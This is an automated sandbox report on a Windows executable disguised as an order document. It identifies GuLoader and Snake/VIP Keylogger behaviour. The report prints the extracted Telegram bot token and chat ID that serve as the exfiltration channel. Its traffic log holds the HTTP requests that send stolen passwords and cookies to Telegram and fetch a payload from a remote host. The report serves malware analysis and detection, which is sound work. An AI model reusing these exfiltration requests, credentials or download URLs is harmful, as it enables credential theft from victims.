Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDER 20240986 OA.exe

Overview

General Information

Sample name:ORDER 20240986 OA.exe
Analysis ID:1559976
MD5:9f036462b07002efdf646b0995217bbd
SHA1:fbfd528f12735ecfa48f4d0fde42aef883e1c678
SHA256:491cf03511ae77ed758d9b36f3237da0ef099370144ed61367146fee1c2bacee
Tags:exeuser-lowmal3
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ORDER 20240986 OA.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\ORDER 20240986 OA.exe" MD5: 9F036462B07002EFDF646B0995217BBD)
    • ORDER 20240986 OA.exe (PID: 7832 cmdline: "C:\Users\user\Desktop\ORDER 20240986 OA.exe" MD5: 9F036462B07002EFDF646B0995217BBD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8", "Chat_id": "6553726543", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2287296673.000000000083C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
    00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000004.00000002.2970820723.0000000037CDA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 4 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T09:01:30.740019+010028033053Unknown Traffic192.168.2.449806188.114.96.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T09:01:26.473582+010028032742Potentially Bad Traffic192.168.2.449794158.101.44.24280TCP
            2024-11-21T09:01:29.129872+010028032742Potentially Bad Traffic192.168.2.449794158.101.44.24280TCP
            2024-11-21T09:01:32.301732+010028032742Potentially Bad Traffic192.168.2.449812158.101.44.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T09:01:22.011646+010028032702Potentially Bad Traffic192.168.2.449783167.250.5.91443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8", "Chat_id": "6553726543", "Version": "4.4"}
            Source: ORDER 20240986 OA.exe.7832.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendMessage"}
            Source: ORDER 20240986 OA.exeReversingLabs: Detection: 44%
            Source: ORDER 20240986 OA.exeVirustotal: Detection: 33%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: ORDER 20240986 OA.exeJoe Sandbox ML: detected

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE887A8 CryptUnprotectData,4_2_3AE887A8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE88EF1 CryptUnprotectData,4_2_3AE88EF1
            Source: ORDER 20240986 OA.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49800 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.4:49783 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49876 version: TLS 1.2
            Source: ORDER 20240986 OA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_00402868 FindFirstFileW,4_2_00402868
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_004065DA FindFirstFileW,FindClose,4_2_004065DA
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004059A9
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0015F45Dh4_2_0015F2C0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0015F45Dh4_2_0015F4AC
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0015FC19h4_2_0015F961
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07566970h4_2_07566678
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07568AE8h4_2_075687F0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756C448h4_2_0756C150
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07563E26h4_2_07563B58
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756EF50h4_2_0756EC58
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756030Eh4_2_07560040
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07566E38h4_2_07566B40
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07565E16h4_2_07565B48
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07569940h4_2_07569648
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756D768h4_2_0756D470
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07564746h4_2_07564478
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07560C2Eh4_2_07560960
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07568158h4_2_07567E60
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756AC60h4_2_0756A968
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 075619DEh4_2_07561710
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07569E08h4_2_07569B10
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07562BE6h4_2_07562918
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756C910h4_2_0756C618
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756E0F8h4_2_0756DE00
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07564BD7h4_2_07564908
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07567300h4_2_07567008
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756B128h4_2_0756AE30
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07563506h4_2_07563238
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756DC30h4_2_0756D938
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756F418h4_2_0756F120
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 075654F6h4_2_07565228
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07568620h4_2_07568328
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756079Eh4_2_075604D0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 075677C8h4_2_075674D0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07566347h4_2_07565FD8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756A2D0h4_2_07569FD8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756BAB8h4_2_0756B7C0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756E5C0h4_2_0756E2C8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 075610BEh4_2_07560DF0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 075622C6h4_2_07561FF8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756B5F0h4_2_0756B2F8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756CDD8h4_2_0756CAE0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 075642B6h4_2_07563FE8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756F8E0h4_2_0756F5E8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756EA88h4_2_0756E790
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07565066h4_2_07564D98
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07567C90h4_2_07567998
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756154Eh4_2_07561280
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07569478h4_2_07569180
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07562756h4_2_07562488
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756BF80h4_2_0756BC88
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756FDA8h4_2_0756FAB0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07565986h4_2_075656B8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07568FB0h4_2_07568CB8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07561E47h4_2_07561BA0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756A798h4_2_0756A4A0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07563076h4_2_07562DA8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 0756D2A0h4_2_0756CFA8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07621FE8h4_2_07621CF0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07621658h4_2_07621360
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07620801h4_2_07620508
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07620CC8h4_2_076209D0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07620338h4_2_07620040
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07621B20h4_2_07621828
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 07621190h4_2_07620E98
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_07663E70
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_07663E60
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_07660A03
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_07660A10
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC9E0A9h4_2_3AC9DE00
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC931E0h4_2_3AC92DC8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC92C19h4_2_3AC92968
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC9E959h4_2_3AC9E6B0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC9E501h4_2_3AC9E258
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC9F661h4_2_3AC9F3B8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC9F209h4_2_3AC9EF60
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC9EDB1h4_2_3AC9EB08
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC90D0Dh4_2_3AC90B30
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC91697h4_2_3AC90B30
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC9D3A1h4_2_3AC9D0F8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC9CF49h4_2_3AC9CCA0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_3AC90040
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC9FAB9h4_2_3AC9F810
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC9DC51h4_2_3AC9D9A8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC931E0h4_2_3AC92DB8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC9D7F9h4_2_3AC9D550
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AC931E0h4_2_3AC9310E
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE89280h4_2_3AE88FB0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE87EB5h4_2_3AE87B78
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE81449h4_2_3AE811A0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE8F5C6h4_2_3AE8F2F8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE87571h4_2_3AE872C8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE85179h4_2_3AE84ED0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE82151h4_2_3AE81EA8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE8F136h4_2_3AE8EE68
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE8D146h4_2_3AE8CE78
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE84D21h4_2_3AE84A78
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE87119h4_2_3AE86E70
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE81CF9h4_2_3AE81A50
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE848C9h4_2_3AE84620
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE86CC1h4_2_3AE86A18
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE85E81h4_2_3AE85BD8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE8BA76h4_2_3AE8B7A8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE82E59h4_2_3AE82BB0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE8FA56h4_2_3AE8F788
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE85A29h4_2_3AE85780
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE8DA66h4_2_3AE8D798
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE82A01h4_2_3AE82758
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE855D1h4_2_3AE85328
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE879C9h4_2_3AE87720
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE8D5D6h4_2_3AE8D308
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE825A9h4_2_3AE82300
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE8B5E6h4_2_3AE8B318
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE80B99h4_2_3AE808F0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE8C396h4_2_3AE8C0C8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE8E386h4_2_3AE8E0B8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE86733h4_2_3AE86488
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then mov esp, ebp4_2_3AE8B081
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE80741h4_2_3AE80498
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE83709h4_2_3AE83460
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE802E9h4_2_3AE80040
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE8DEF6h4_2_3AE8DC28
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE8BF06h4_2_3AE8BC38
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE862D9h4_2_3AE86030
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE832B1h4_2_3AE83008
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE8CCB6h4_2_3AE8C9E8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE818A1h4_2_3AE815F8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then mov esp, ebp4_2_3AE8B1C0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE8ECA6h4_2_3AE8E9D8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE80FF1h4_2_3AE80D48
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE8E816h4_2_3AE8E548
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4x nop then jmp 3AE8C826h4_2_3AE8C558

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:897506%0D%0ADate%20and%20Time:%2022/11/2024%20/%2006:52:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20897506%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553726543&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b4a7224cc3aHost: api.telegram.orgContent-Length: 580
            Source: global trafficHTTP traffic detected: POST /bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553726543&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b6f4848dbcfHost: api.telegram.orgContent-Length: 7045
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49794 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49812 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49783 -> 167.250.5.91:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49806 -> 188.114.96.3:443
            Source: global trafficHTTP traffic detected: GET /yak/ZnWGURK2.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sierrassinfinusadas.com.arCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
